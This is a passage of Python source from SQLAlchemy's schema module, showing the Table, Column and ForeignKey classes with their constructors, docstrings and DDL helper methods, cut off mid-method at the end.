:param extend_existing: When ``True``, indicates that if this Table is already
present in the given :class:`.MetaData`, apply further arguments within
the constructor to the existing :class:`.Table`.
If extend_existing or keep_existing are not set, an error is
raised if additional table modifiers are specified when
the given :class:`.Table` is already present in the :class:`.MetaData`.
:param implicit_returning: True by default - indicates that
RETURNING can be used by default to fetch newly inserted primary key
values, for backends which support this. Note that
create_engine() also provides an implicit_returning flag.
:param include_columns: A list of strings indicating a subset of
columns to be loaded via the ``autoload`` operation; table columns that
aren't present in this list will not be represented on the resulting
``Table`` object. Defaults to ``None`` which indicates all columns
should be reflected.
:param info: A dictionary which defaults to ``{}``. A space to store
application specific data. This must be a dictionary.
:param keep_existing: When ``True``, indicates that if this Table
is already present in the given :class:`.MetaData`, ignore
further arguments within the constructor to the existing
:class:`.Table`, and return the :class:`.Table` object as
originally created. This is to allow a function that wishes
to define a new :class:`.Table` on first call, but on
subsequent calls will return the same :class:`.Table`,
without any of the declarations (particularly constraints)
being applied a second time. Also see extend_existing.
If extend_existing or keep_existing are not set, an error is
raised if additional table modifiers are specified when
the given :class:`.Table` is already present in the :class:`.MetaData`.
:param listeners: A list of tuples of the form ``(<eventname>, <fn>)``
which will be passed to :func:`.event.listen` upon construction.
This alternate hook to :func:`.event.listen` allows the establishment
of a listener function specific to this :class:`.Table` before
the "autoload" process begins. Particularly useful for
the :meth:`.events.column_reflect` event::
def listen_for_reflect(table, column_info):
"handle the column reflection event"
# ...
t = Table(
'sometable',
autoload=True,
listeners=[
('column_reflect', listen_for_reflect)
])
:param mustexist: When ``True``, indicates that this Table must already
be present in the given :class:`.MetaData` collection, else
an exception is raised.
:param prefixes:
A list of strings to insert after CREATE in the CREATE TABLE
statement. They will be separated by spaces.
:param quote: Force quoting of this table's name on or off, corresponding
to ``True`` or ``False``. When left at its default of ``None``,
the column identifier will be quoted according to whether the name is
case sensitive (identifiers with at least one upper case character are
treated as case sensitive), or if it's a reserved word. This flag
is only needed to force quoting of a reserved word which is not known
by the SQLAlchemy dialect.
:param quote_schema: same as 'quote' but applies to the schema identifier.
:param schema: The *schema name* for this table, which is required if
the table resides in a schema other than the default selected schema
for the engine's database connection. Defaults to ``None``.
:param useexisting: Deprecated. Use extend_existing.
"""
__visit_name__ = 'table'
def __new__(cls, *args, **kw):
if not args:
# python3k pickle seems to call this
return object.__new__(cls)
try:
name, metadata, args = args[0], args[1], args[2:]
except IndexError:
raise TypeError("Table() takes at least two arguments")
schema = kw.get('schema', None)
keep_existing = kw.pop('keep_existing', False)
extend_existing = kw.pop('extend_existing', False)
if 'useexisting' in kw:
util.warn_deprecated("useexisting is deprecated. Use extend_existing.")
if extend_existing:
raise exc.ArgumentError("useexisting is synonymous "
"with extend_existing.")
extend_existing = kw.pop('useexisting', False)
if keep_existing and extend_existing:
raise exc.ArgumentError("keep_existing and extend_existing "
"are mutually exclusive.")
mustexist = kw.pop('mustexist', False)
key = _get_table_key(name, schema)
if key in metadata.tables:
if not keep_existing and not extend_existing and bool(args):
raise exc.InvalidRequestError(
"Table '%s' is already defined for this MetaData "
"instance. Specify 'extend_existing=True' "
"to redefine "
"options and columns on an "
"existing Table object." % key)
table = metadata.tables[key]
if extend_existing:
table._init_existing(*args, **kw)
return table
else:
if mustexist:
raise exc.InvalidRequestError(
"Table '%s' not defined" % (key))
table = object.__new__(cls)
table.dispatch.before_parent_attach(table, metadata)
metadata._add_table(name, schema, table)
try:
table._init(name, metadata, *args, **kw)
table.dispatch.after_parent_attach(table, metadata)
return table
except:
metadata._remove_table(name, schema)
raise
def __init__(self, *args, **kw):
"""Constructor for :class:`~.schema.Table`.
This method is a no-op. See the top-level
documentation for :class:`~.schema.Table`
for constructor arguments.
"""
# __init__ is overridden to prevent __new__ from
# calling the superclass constructor.
def _init(self, name, metadata, *args, **kwargs):
super(Table, self).__init__(name)
self.metadata = metadata
self.schema = kwargs.pop('schema', None)
self.indexes = set()
self.constraints = set()
self._columns = expression.ColumnCollection()
PrimaryKeyConstraint()._set_parent_with_dispatch(self)
self.foreign_keys = set()
self._extra_dependencies = set()
self.kwargs = {}
if self.schema is not None:
self.fullname = "%s.%s" % (self.schema, self.name)
else:
self.fullname = self.name
autoload = kwargs.pop('autoload', False)
autoload_with = kwargs.pop('autoload_with', None)
include_columns = kwargs.pop('include_columns', None)
self.implicit_returning = kwargs.pop('implicit_returning', True)
self.quote = kwargs.pop('quote', None)
self.quote_schema = kwargs.pop('quote_schema', None)
if 'info' in kwargs:
self.info = kwargs.pop('info')
if 'listeners' in kwargs:
listeners = kwargs.pop('listeners')
for evt, fn in listeners:
event.listen(self, evt, fn)
self._prefixes = kwargs.pop('prefixes', [])
self._extra_kwargs(**kwargs)
# load column definitions from the database if 'autoload' is defined
# we do it after the table is in the singleton dictionary to support
# circular foreign keys
if autoload:
if autoload_with:
autoload_with.run_callable(
autoload_with.dialect.reflecttable,
self, include_columns
)
else:
bind = _bind_or_error(metadata,
msg="No engine is bound to this Table's MetaData. "
"Pass an engine to the Table via "
"autoload_with=<someengine>, "
"or associate the MetaData with an engine via "
"metadata.bind=<someengine>")
bind.run_callable(
bind.dialect.reflecttable,
self, include_columns
)
# initialize all the column, etc. objects. done after reflection to
# allow user-overrides
self._init_items(*args)
@property
def _sorted_constraints(self):
"""Return the set of constraints as a list, sorted by creation order."""
return sorted(self.constraints, key=lambda c:c._creation_order)
def _init_existing(self, *args, **kwargs):
autoload = kwargs.pop('autoload', False)
autoload_with = kwargs.pop('autoload_with', None)
schema = kwargs.pop('schema', None)
if schema and schema != self.schema:
raise exc.ArgumentError(
"Can't change schema of existing table "
"from '%s' to '%s'" % (self.schema, schema))
include_columns = kwargs.pop('include_columns', None)
if include_columns:
for c in self.c:
if c.name not in include_columns:
self._columns.remove(c)
for key in ('quote', 'quote_schema'):
if key in kwargs:
setattr(self, key, kwargs.pop(key))
if 'info' in kwargs:
self.info = kwargs.pop('info')
self._extra_kwargs(**kwargs)
self._init_items(*args)
def _extra_kwargs(self, **kwargs):
# validate remaining kwargs that they all specify DB prefixes
if len([k for k in kwargs
if not re.match(
r'^(?:%s)_' %
'|'.join(dialects.__all__), k
)
]):
raise TypeError(
"Invalid argument(s) for Table: %r" % kwargs.keys())
self.kwargs.update(kwargs)
def _init_collections(self):
pass
@util.memoized_property
def _autoincrement_column(self):
for col in self.primary_key:
if col.autoincrement and \
issubclass(col.type._type_affinity, sqltypes.Integer) and \
not col.foreign_keys and \
isinstance(col.default, (type(None), Sequence)) and \
(col.server_default is None or col.server_default.reflected):
return col
@property
def key(self):
return _get_table_key(self.name, self.schema)
def __repr__(self):
return "Table(%s)" % ', '.join(
[repr(self.name)] + [repr(self.metadata)] +
[repr(x) for x in self.columns] +
["%s=%s" % (k, repr(getattr(self, k))) for k in ['schema']])
def __str__(self):
return _get_table_key(self.description, self.schema)
@property
def bind(self):
"""Return the connectable associated with this Table."""
return self.metadata and self.metadata.bind or None
def add_is_dependent_on(self, table):
"""Add a 'dependency' for this Table.
This is another Table object which must be created
first before this one can, or dropped after this one.
Usually, dependencies between tables are determined via
ForeignKey objects. However, for other situations that
create dependencies outside of foreign keys (rules, inheriting),
this method can manually establish such a link.
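For example, a rough sketch, where ``widgets`` and ``widget_audit`` are
hypothetical :class:`.Table` objects on the same :class:`.MetaData`;
``widget_audit`` will then be created before ``widgets`` and dropped
after it::
    widgets.add_is_dependent_on(widget_audit)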
"""
self._extra_dependencies.add(table)
def append_column(self, column):
"""Append a :class:`~.schema.Column` to this :class:`~.schema.Table`.
The "key" of the newly added :class:`~.schema.Column`, i.e. the
value of its ``.key`` attribute, will then be available
in the ``.c`` collection of this :class:`~.schema.Table`, and the
column definition will be included in any CREATE TABLE, SELECT,
UPDATE, etc. statements generated from this :class:`~.schema.Table`
construct.
Note that this does **not** change the definition of the table
as it exists within any underlying database, assuming that
table has already been created in the database. Relational
databases support the addition of columns to existing tables
using the SQL ALTER command, which would need to be
emitted for an already-existing table that doesn't contain
the newly added column.
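For example, a minimal sketch (``users`` is assumed to be an existing
:class:`~.schema.Table`)::
    users.append_column(Column('nickname', String(30)))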
"""
column._set_parent_with_dispatch(self)
def append_constraint(self, constraint):
"""Append a :class:`~.schema.Constraint` to this :class:`~.schema.Table`.
This has the effect of the constraint being included in any
future CREATE TABLE statement, assuming specific DDL creation
events have not been associated with the given :class:`~.schema.Constraint`
object.
Note that this does **not** produce the constraint within the
relational database automatically, for a table that already exists
in the database. To add a constraint to an
existing relational database table, the SQL ALTER command must
be used. SQLAlchemy also provides the :class:`.AddConstraint` construct
which can produce this SQL when invoked as an executable clause.
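For example, a minimal sketch (``users`` is assumed to be an existing
:class:`~.schema.Table` with an ``email`` column)::
    users.append_constraint(
        UniqueConstraint('email', name='uq_user_email'))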
"""
constraint._set_parent_with_dispatch(self)
def append_ddl_listener(self, event_name, listener):
"""Append a DDL event listener to this ``Table``.
Deprecated. See :class:`.DDLEvents`.
"""
def adapt_listener(target, connection, **kw):
listener(event_name, target, connection, **kw)
event.listen(self, event_name.replace('-', '_'), adapt_listener)
def _set_parent(self, metadata):
metadata._add_table(self.name, self.schema, self)
self.metadata = metadata
def get_children(self, column_collections=True,
schema_visitor=False, **kw):
if not schema_visitor:
return expression.TableClause.get_children(
self, column_collections=column_collections, **kw)
else:
if column_collections:
return list(self.columns)
else:
return []
def exists(self, bind=None):
"""Return True if this table exists."""
if bind is None:
bind = _bind_or_error(self)
return bind.run_callable(bind.dialect.has_table,
self.name, schema=self.schema)
def create(self, bind=None, checkfirst=False):
"""Issue a ``CREATE`` statement for this
:class:`.Table`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.create_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=False):
"""Issue a ``DROP`` statement for this
:class:`.Table`, using the given :class:`.Connectable`
for connectivity.
See also :meth:`.MetaData.drop_all`.
"""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst)
def tometadata(self, metadata, schema=RETAIN_SCHEMA):
"""Return a copy of this :class:`.Table` associated with a different
:class:`.MetaData`.
E.g.::
# create two metadata
meta1 = MetaData('sqlite:///querytest.db')
meta2 = MetaData()
# load 'users' from the sqlite engine
users_table = Table('users', meta1, autoload=True)
# create the same Table object for the plain metadata
users_table_2 = users_table.tometadata(meta2)
"""
if schema is RETAIN_SCHEMA:
schema = self.schema
key = _get_table_key(self.name, schema)
if key in metadata.tables:
util.warn("Table '%s' already exists within the given "
"MetaData - not copying." % self.description)
return metadata.tables[key]
args = []
for c in self.columns:
args.append(c.copy(schema=schema))
for c in self.constraints:
args.append(c.copy(schema=schema))
table = Table(
self.name, metadata, schema=schema,
*args, **self.kwargs
)
for index in self.indexes:
# skip indexes that would be generated
# by the 'index' flag on Column
if len(index.columns) == 1 and \
list(index.columns)[0].index:
continue
Index(index.name,
unique=index.unique,
*[table.c[col] for col in index.columns.keys()],
**index.kwargs)
table.dispatch._update(self.dispatch)
return table
class Column(SchemaItem, expression.ColumnClause):
"""Represents a column in a database table."""
__visit_name__ = 'column'
def __init__(self, *args, **kwargs):
"""
Construct a new ``Column`` object.
:param name: The name of this column as represented in the database.
This argument may be the first positional argument, or specified
via keyword.
Names which contain no upper case characters
will be treated as case insensitive names, and will not be quoted
unless they are a reserved word. Names with any number of upper
case characters will be quoted and sent exactly. Note that this
behavior applies even for databases which standardize upper
case names as case insensitive such as Oracle.
The name field may be omitted at construction time and applied
later, at any time before the Column is associated with a
:class:`.Table`. This is to support convenient
usage within the :mod:`~sqlalchemy.ext.declarative` extension.
:param type\_: The column's type, indicated using an instance which
subclasses :class:`~sqlalchemy.types.TypeEngine`. If no arguments
are required for the type, the class of the type can be sent
as well, e.g.::
# use a type with arguments
Column('data', String(50))
# use no arguments
Column('level', Integer)
The ``type`` argument may be the second positional argument
or specified by keyword.
There is partial support for automatic detection of the
type based on that of a :class:`.ForeignKey` associated
with this column, if the type is specified as ``None``.
However, this feature is not fully implemented and
may not function in all cases.
:param \*args: Additional positional arguments include various
:class:`.SchemaItem` derived constructs which will be applied
as options to the column. These include instances of
:class:`.Constraint`, :class:`.ForeignKey`, :class:`.ColumnDefault`,
and :class:`.Sequence`. In some cases an equivalent keyword
argument is available such as ``server_default``, ``default``
and ``unique``.
:param autoincrement: This flag may be set to ``False`` to
indicate an integer primary key column that should not be
considered to be the "autoincrement" column, that is
the integer primary key column which generates values
implicitly upon INSERT and whose value is usually returned
via the DBAPI cursor.lastrowid attribute. It defaults
to ``True`` to satisfy the common use case of a table
with a single integer primary key column. If the table
has a composite primary key consisting of more than one
integer column, set this flag to ``False`` on each column
except the one that should be considered "autoincrement".
The setting *only* has an effect for columns which are:
* Integer derived (i.e. INT, SMALLINT, BIGINT)
* Part of the primary key
* Not referenced by any foreign keys
* Have no server side or client side defaults (with the exception
of Postgresql SERIAL).
The setting has these two effects on columns that meet the
above criteria:
* DDL issued for the column will include database-specific
keywords intended to signify this column as an
"autoincrement" column, such as AUTO_INCREMENT on MySQL,
SERIAL on Postgresql, and IDENTITY on MS-SQL. It does
*not* issue AUTOINCREMENT for SQLite since this is a
special SQLite flag that is not required for autoincrementing
behavior. See the SQLite dialect documentation for
information on SQLite's AUTOINCREMENT.
* The column will be considered to be available as
cursor.lastrowid or equivalent, for those dialects which
"post fetch" newly inserted identifiers after a row has
been inserted (SQLite, MySQL, MS-SQL). It does not have
any effect in this regard for databases that use sequences
to generate primary key identifiers (i.e. Firebird, Postgresql,
Oracle).
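For example, a sketch of a composite integer primary key where only
``order_id`` is left as the "autoincrement" column (table and column
names here are illustrative only)::
    t = Table('orders', metadata,
        Column('region_id', Integer, primary_key=True, autoincrement=False),
        Column('order_id', Integer, primary_key=True)
    )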
:param default: A scalar, Python callable, or
:class:`~sqlalchemy.sql.expression.ClauseElement` representing the
*default value* for this column, which will be invoked upon insert
if this column is otherwise not specified in the VALUES clause of
the insert. This is a shortcut to using :class:`.ColumnDefault` as
a positional argument.
Contrast this argument to ``server_default`` which creates a
default generator on the database side.
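For example, a minimal sketch using a Python callable as the default
(``datetime`` is from the standard library; the column name is
illustrative)::
    from datetime import datetime
    Column('created_at', DateTime, default=datetime.utcnow)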
:param doc: optional String that can be used by the ORM or similar
to document attributes. This attribute does not render SQL
comments (a future attribute 'comment' will achieve that).
:param key: An optional string identifier which will identify this
``Column`` object on the :class:`.Table`. When a key is provided,
this is the only identifier referencing the ``Column`` within the
application, including ORM attribute mapping; the ``name`` field
is used only when rendering SQL.
:param index: When ``True``, indicates that the column is indexed.
This is a shortcut for using a :class:`.Index` construct on the
table. To specify indexes with explicit names or indexes that
contain multiple columns, use the :class:`.Index` construct
instead.
:param info: A dictionary which defaults to ``{}``. A space to store
application specific data. This must be a dictionary.
:param nullable: If set to the default of ``True``, indicates the
column will be rendered as allowing NULL, else it's rendered as
NOT NULL. This parameter is only used when issuing CREATE TABLE
statements.
:param onupdate: A scalar, Python callable, or
:class:`~sqlalchemy.sql.expression.ClauseElement` representing a
default value to be applied to the column within UPDATE
statements, which will be invoked upon update if this column is not
present in the SET clause of the update. This is a shortcut to
using :class:`.ColumnDefault` as a positional argument with
``for_update=True``.
:param primary_key: If ``True``, marks this column as a primary key
column. Multiple columns can have this flag set to specify
composite primary keys. As an alternative, the primary key of a
:class:`.Table` can be specified via an explicit
:class:`.PrimaryKeyConstraint` object.
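For example, a sketch of a composite primary key declared via an
explicit :class:`.PrimaryKeyConstraint` (names are illustrative)::
    Table('pages', metadata,
        Column('book_id', Integer),
        Column('page_no', Integer),
        PrimaryKeyConstraint('book_id', 'page_no')
    )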
:param server_default: A :class:`.FetchedValue` instance, str, Unicode
or :func:`~sqlalchemy.sql.expression.text` construct representing
the DDL DEFAULT value for the column.
String types will be emitted as-is, surrounded by single quotes::
Column('x', Text, server_default="val")
x TEXT DEFAULT 'val'
A :func:`~sqlalchemy.sql.expression.text` expression will be
rendered as-is, without quotes::
Column('y', DateTime, server_default=text('NOW()'))
y DATETIME DEFAULT NOW()
Strings and text() will be converted into a :class:`.DefaultClause`
object upon initialization.
Use :class:`.FetchedValue` to indicate that an already-existing
column will generate a default value on the database side which
will be available to SQLAlchemy for post-fetch after inserts. This
construct does not specify any DDL and the implementation is left
to the database, such as via a trigger.
:param server_onupdate: A :class:`.FetchedValue` instance
representing a database-side default generation function. This
indicates to SQLAlchemy that a newly generated value will be
available after updates. This construct does not specify any DDL
and the implementation is left to the database, such as via a
trigger.
:param quote: Force quoting of this column's name on or off,
corresponding to ``True`` or ``False``. When left at its default
of ``None``, the column identifier will be quoted according to
whether the name is case sensitive (identifiers with at least one
upper case character are treated as case sensitive), or if it's a
reserved word. This flag is only needed to force quoting of a
reserved word which is not known by the SQLAlchemy dialect.
:param unique: When ``True``, indicates that this column contains a
unique constraint, or if ``index`` is ``True`` as well, indicates
that the :class:`.Index` should be created with the unique flag.
To specify multiple columns in the constraint/index or to specify
an explicit name, use the :class:`.UniqueConstraint` or
:class:`.Index` constructs explicitly.
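For example, a minimal sketch; the single-column form is roughly
equivalent to appending an unnamed :class:`.UniqueConstraint` to the
parent :class:`.Table` (the column name is illustrative)::
    Column('email', String(100), unique=True)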
"""
name = kwargs.pop('name', None)
type_ = kwargs.pop('type_', None)
args = list(args)
if args:
if isinstance(args[0], basestring):
if name is not None:
raise exc.ArgumentError(
"May not pass name positionally and as a keyword.")
name = args.pop(0)
if args:
coltype = args[0]
if (isinstance(coltype, sqltypes.TypeEngine) or
(isinstance(coltype, type) and
issubclass(coltype, sqltypes.TypeEngine))):
if type_ is not None:
raise exc.ArgumentError(
"May not pass type_ positionally and as a keyword.")
type_ = args.pop(0)
no_type = type_ is None
super(Column, self).__init__(name, None, type_)
self.key = kwargs.pop('key', name)
self.primary_key = kwargs.pop('primary_key', False)
self.nullable = kwargs.pop('nullable', not self.primary_key)
self.default = kwargs.pop('default', None)
self.server_default = kwargs.pop('server_default', None)
self.server_onupdate = kwargs.pop('server_onupdate', None)
self.index = kwargs.pop('index', None)
self.unique = kwargs.pop('unique', None)
self.quote = kwargs.pop('quote', None)
self.doc = kwargs.pop('doc', None)
self.onupdate = kwargs.pop('onupdate', None)
self.autoincrement = kwargs.pop('autoincrement', True)
self.constraints = set()
self.foreign_keys = set()
# check if this Column is proxying another column
if '_proxies' in kwargs:
self.proxies = kwargs.pop('_proxies')
# otherwise, add DDL-related events
elif isinstance(self.type, sqltypes.SchemaType):
self.type._set_parent_with_dispatch(self)
if self.default is not None:
if isinstance(self.default, (ColumnDefault, Sequence)):
args.append(self.default)
else:
if getattr(self.type, '_warn_on_bytestring', False):
# Py3K
#if isinstance(self.default, bytes):
# Py2K
if isinstance(self.default, str):
# end Py2K
util.warn("Unicode column received non-unicode "
"default value.")
args.append(ColumnDefault(self.default))
if self.server_default is not None:
if isinstance(self.server_default, FetchedValue):
args.append(self.server_default)
else:
args.append(DefaultClause(self.server_default))
if self.onupdate is not None:
if isinstance(self.onupdate, (ColumnDefault, Sequence)):
args.append(self.onupdate)
else:
args.append(ColumnDefault(self.onupdate, for_update=True))
if self.server_onupdate is not None:
if isinstance(self.server_onupdate, FetchedValue):
args.append(self.server_onupdate)
else:
args.append(DefaultClause(self.server_onupdate,
for_update=True))
self._init_items(*args)
if not self.foreign_keys and no_type:
raise exc.ArgumentError("'type' is required on Column objects "
"which have no foreign keys.")
util.set_creation_order(self)
if 'info' in kwargs:
self.info = kwargs.pop('info')
if kwargs:
raise exc.ArgumentError(
"Unknown arguments passed to Column: " + repr(kwargs.keys()))
def __str__(self):
if self.name is None:
return "(no name)"
elif self.table is not None:
if self.table.named_with_column:
return (self.table.description + "." + self.description)
else:
return self.description
else:
return self.description
def references(self, column):
"""Return True if this Column references the given column via foreign
key."""
for fk in self.foreign_keys:
if fk.column.proxy_set.intersection(column.proxy_set):
return True
else:
return False
def append_foreign_key(self, fk):
fk._set_parent_with_dispatch(self)
def __repr__(self):
kwarg = []
if self.key != self.name:
kwarg.append('key')
if self.primary_key:
kwarg.append('primary_key')
if not self.nullable:
kwarg.append('nullable')
if self.onupdate:
kwarg.append('onupdate')
if self.default:
kwarg.append('default')
if self.server_default:
kwarg.append('server_default')
return "Column(%s)" % ', '.join(
[repr(self.name)] + [repr(self.type)] +
[repr(x) for x in self.foreign_keys if x is not None] +
[repr(x) for x in self.constraints] +
[(self.table is not None and "table=<%s>" %
self.table.description or "")] +
["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg])
def _set_parent(self, table):
if not self.name:
raise exc.ArgumentError(
"Column must be constructed with a non-blank name or "
"assign a non-blank .name before adding to a Table.")
if self.key is None:
self.key = self.name
if getattr(self, 'table', None) is not None:
raise exc.ArgumentError(
"Column object already assigned to Table '%s'" %
self.table.description)
if self.key in table._columns:
col = table._columns.get(self.key)
for fk in list(col.foreign_keys):
col.foreign_keys.remove(fk)
table.foreign_keys.remove(fk)
if fk.constraint in table.constraints:
# this might have been removed
# already, if it's a composite constraint
# and more than one col being replaced
table.constraints.remove(fk.constraint)
table._columns.replace(self)
if self.primary_key:
table.primary_key._replace(self)
elif self.key in table.primary_key:
raise exc.ArgumentError(
"Trying to redefine primary-key column '%s' as a "
"non-primary-key column on table '%s'" % (
self.key, table.fullname))
self.table = table
if self.index:
if isinstance(self.index, basestring):
raise exc.ArgumentError(
"The 'index' keyword argument on Column is boolean only. "
"To create indexes with a specific name, create an "
"explicit Index object external to the Table.")
Index(expression._generated_label('ix_%s' % self._label), self, unique=self.unique)
elif self.unique:
if isinstance(self.unique, basestring):
raise exc.ArgumentError(
"The 'unique' keyword argument on Column is boolean "
"only. To create unique constraints or indexes with a "
"specific name, append an explicit UniqueConstraint to "
"the Table's list of elements, or create an explicit "
"Index object external to the Table.")
table.append_constraint(UniqueConstraint(self.key))
def _on_table_attach(self, fn):
if self.table is not None:
fn(self, self.table)
event.listen(self, 'after_parent_attach', fn)
def copy(self, **kw):
"""Create a copy of this ``Column``, uninitialized.
This is used in ``Table.tometadata``.
"""
# Constraint objects plus non-constraint-bound ForeignKey objects
args = \
[c.copy(**kw) for c in self.constraints] + \
[c.copy(**kw) for c in self.foreign_keys if not c.constraint]
c = Column(
name=self.name,
type_=self.type,
key = self.key,
primary_key = self.primary_key,
nullable = self.nullable,
unique = self.unique,
quote=self.quote,
index=self.index,
autoincrement=self.autoincrement,
default=self.default,
server_default=self.server_default,
onupdate=self.onupdate,
server_onupdate=self.server_onupdate,
info=self.info,
doc=self.doc,
*args
)
c.dispatch._update(self.dispatch)
return c
def _make_proxy(self, selectable, name=None):
"""Create a *proxy* for this column.
This is a copy of this ``Column`` referenced by a different parent
(such as an alias or select statement). The column should
be used only in select scenarios, as its full DDL/default
information is not transferred.
"""
fk = [ForeignKey(f.column) for f in self.foreign_keys]
if name is None and self.name is None:
raise exc.InvalidRequestError("Cannot initialize a sub-selectable"
" with this Column object until its 'name' has "
"been assigned.")
try:
c = self._constructor(
name or self.name,
self.type,
key = name or self.key,
primary_key = self.primary_key,
nullable = self.nullable,
quote=self.quote, _proxies=[self], *fk)
except TypeError, e:
# Py3K
#raise TypeError(
# "Could not create a copy of this %r object. "
# "Ensure the class includes a _constructor() "
# "attribute or method which accepts the "
# "standard Column constructor arguments, or "
# "references the Column class itself." % self.__class__) from e
# Py2K
raise TypeError(
"Could not create a copy of this %r object. "
"Ensure the class includes a _constructor() "
"attribute or method which accepts the "
"standard Column constructor arguments, or "
"references the Column class itself. "
"Original error: %s" % (self.__class__, e))
# end Py2K
c.table = selectable
selectable._columns.add(c)
if self.primary_key:
selectable.primary_key.add(c)
c.dispatch.after_parent_attach(c, selectable)
return c
def get_children(self, schema_visitor=False, **kwargs):
if schema_visitor:
return [x for x in (self.default, self.onupdate)
if x is not None] + \
list(self.foreign_keys) + list(self.constraints)
else:
return expression.ColumnClause.get_children(self, **kwargs)
class ForeignKey(SchemaItem):
"""Defines a dependency between two columns.
``ForeignKey`` is specified as an argument to a :class:`.Column` object,
e.g.::
t = Table("remote_table", metadata,
Column("remote_id", ForeignKey("main_table.id"))
)
Note that ``ForeignKey`` is only a marker object that defines
a dependency between two columns. The actual constraint
is in all cases represented by the :class:`.ForeignKeyConstraint`
object. This object will be generated automatically when
a ``ForeignKey`` is associated with a :class:`.Column` which
in turn is associated with a :class:`.Table`. Conversely,
when :class:`.ForeignKeyConstraint` is applied to a :class:`.Table`,
``ForeignKey`` markers are automatically generated to be
present on each associated :class:`.Column`, which are also
associated with the constraint object.
Note that you cannot define a "composite" foreign key constraint,
that is a constraint between a grouping of multiple parent/child
columns, using ``ForeignKey`` objects. To define this grouping,
the :class:`.ForeignKeyConstraint` object must be used, and applied
to the :class:`.Table`. The associated ``ForeignKey`` objects
are created automatically.
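For example, a sketch of a composite foreign key declared with
:class:`.ForeignKeyConstraint` (table and column names are illustrative,
and an ``orders`` table with a composite primary key is assumed to exist
on the same :class:`.MetaData`)::
    Table('order_items', metadata,
        Column('order_region', Integer),
        Column('order_id', Integer),
        Column('sku', String(20)),
        ForeignKeyConstraint(
            ['order_region', 'order_id'],
            ['orders.region_id', 'orders.order_id'])
    )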
The ``ForeignKey`` objects associated with an individual
:class:`.Column` object are available in the `foreign_keys` collection
of that column.
Further examples of foreign key configuration are in
:ref:`metadata_foreignkeys`.
"""
__visit_name__ = 'foreign_key'
def __init__(self, column, _constraint=None, use_alter=False, name=None,
onupdate=None, ondelete=None, deferrable=None,
initially=None, link_to_name=False):
"""
Construct a column-level FOREIGN KEY.
The :class:`.ForeignKey` object when constructed generates a
:class:`.ForeignKeyConstraint` which is associated with the parent
:class:`.Table` object's collection of constraints.
:param column: A single target column for the key relationship. A
:class:`.Column` object or a column name as a string:
``tablename.columnkey`` or ``schema.tablename.columnkey``.
``columnkey`` is the ``key`` which has been assigned to the column
(defaults to the column name itself), unless ``link_to_name`` is
``True`` in which case the rendered name of the column is used.
:param name: Optional string. An in-database name for the key if
`constraint` is not provided.
:param onupdate: Optional string. If set, emit ON UPDATE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param ondelete: Optional string. If set, emit ON DELETE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param deferrable: Optional bool. If set, emit DEFERRABLE or NOT
DEFERRABLE when issuing DDL for this constraint.
:param initially: Optional string. If set, emit INITIALLY <value> when
issuing DDL for this constraint.
:param link_to_name: if True, the string name given in ``column`` is
the rendered name of the referenced column, not its locally
assigned ``key``.
:param use_alter: passed to the underlying
:class:`.ForeignKeyConstraint` to indicate the constraint should be
generated/dropped externally from the CREATE TABLE/ DROP TABLE
statement. See that class's constructor for details.
"""
self._colspec = column
# the linked ForeignKeyConstraint.
# ForeignKey will create this when parent Column
# is attached to a Table, *or* ForeignKeyConstraint
# object passes itself in when creating ForeignKey
# markers.
self.constraint = _constraint
self.use_alter = use_alter
self.name = name
self.onupdate = onupdate
self.ondelete = ondelete
self.deferrable = deferrable
self.initially = initially
self.link_to_name = link_to_name
def __repr__(self):
return "ForeignKey(%r)" % self._get_colspec()
def copy(self, schema=None):
"""Produce a copy of this :class:`.ForeignKey` object.
The new :class:`.ForeignKey` will not be bound
to any :class:`.Column`.
This method is usually used by the internal
copy procedures of :class:`.Column`, :class:`.Table`,
and :class:`.MetaData`.
:param schema: The returned :class:`.ForeignKey` will
reference the original table and column name, qualified
by the given string schema name.
"""
fk = ForeignKey(
self._get_colspec(schema=schema),
use_alter=self.use_alter,
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
deferrable=self.deferrable,
initially=self.initially,
link_to_name=self.link_to_name
)
fk.dispatch._update(self.dispatch)
return fk
def _get_colspec(self, schema=None):
"""Return a string based 'column specification' for this :class:`.ForeignKey`.
This is usually the equivalent of the string-based "tablename.colname"
argument first passed to the object's constructor.
"""
if schema:
return schema + "." + self.column.table.name + \
"." + self.column.key
elif isinstance(self._colspec, basestring):
return self._colspec
elif hasattr(self._colspec, '__clause_element__'):
_column = self._colspec.__clause_element__()
else:
_column = self._colspec
return "%s.%s" % (_column.table.fullname, _column.key)
target_fullname = property(_get_colspec)
def references(self, table):
"""Return True if the given :class:`.Table` is referenced by this :class:`.ForeignKey`."""
return table.corresponding_column(self.column) is not None
def get_referent(self, table):
"""Return the :class:`.Column` in the given :class:`.Table`
referenced by this :class:`.ForeignKey`.
Returns None if this :class:`.ForeignKey` does not reference the given
:class:`.Table`.
"""
return table.corresponding_column(self.column)
@util.memoized_property
def column(self):
"""Return the target :class:`.Column` referenced by this :class:`.ForeignKey`.
If this :class:`.ForeignKey` was created using a
string-based target column specification, this
attribute will on first access initiate a resolution
process to locate the referenced remote
:class:`.Column`. The resolution process traverses
to the parent :class:`.Column`, :class:`.Table`, and
:class:`.MetaData` to proceed - if any of these aren't
yet present, an error is raised.
"""
# ForeignKey inits its remote column as late as possible, so tables
# can be defined without dependencies
if isinstance(self._colspec, basestring):
# locate the parent table this foreign key is attached to. we
# use the "original" column which our parent column represents
# (its a list of columns/other ColumnElements if the parent
# table is a UNION)
for c in self.parent.base_columns:
if isinstance(c, Column):
parenttable = c.table
break
else:
raise exc.ArgumentError(
"Parent column '%s' does not descend from a "
"table-attached Column" % str(self.parent))
m = self._colspec.split('.')
if m is None:
raise exc.ArgumentError(
"Invalid foreign key column specification: %s" %
self._colspec)
# A FK between column 'bar' and table 'foo' can be
# specified as 'foo', 'foo.bar', 'dbo.foo.bar',
# 'otherdb.dbo.foo.bar'. Once we have the column name and
# the table name, treat everything else as the schema
# name. Some databases (e.g. Sybase) support
# inter-database foreign keys. See tickets #1341 and --
# indirectly related -- Ticket #594. This assumes that '.'
# will never appear *within* any component of the FK.
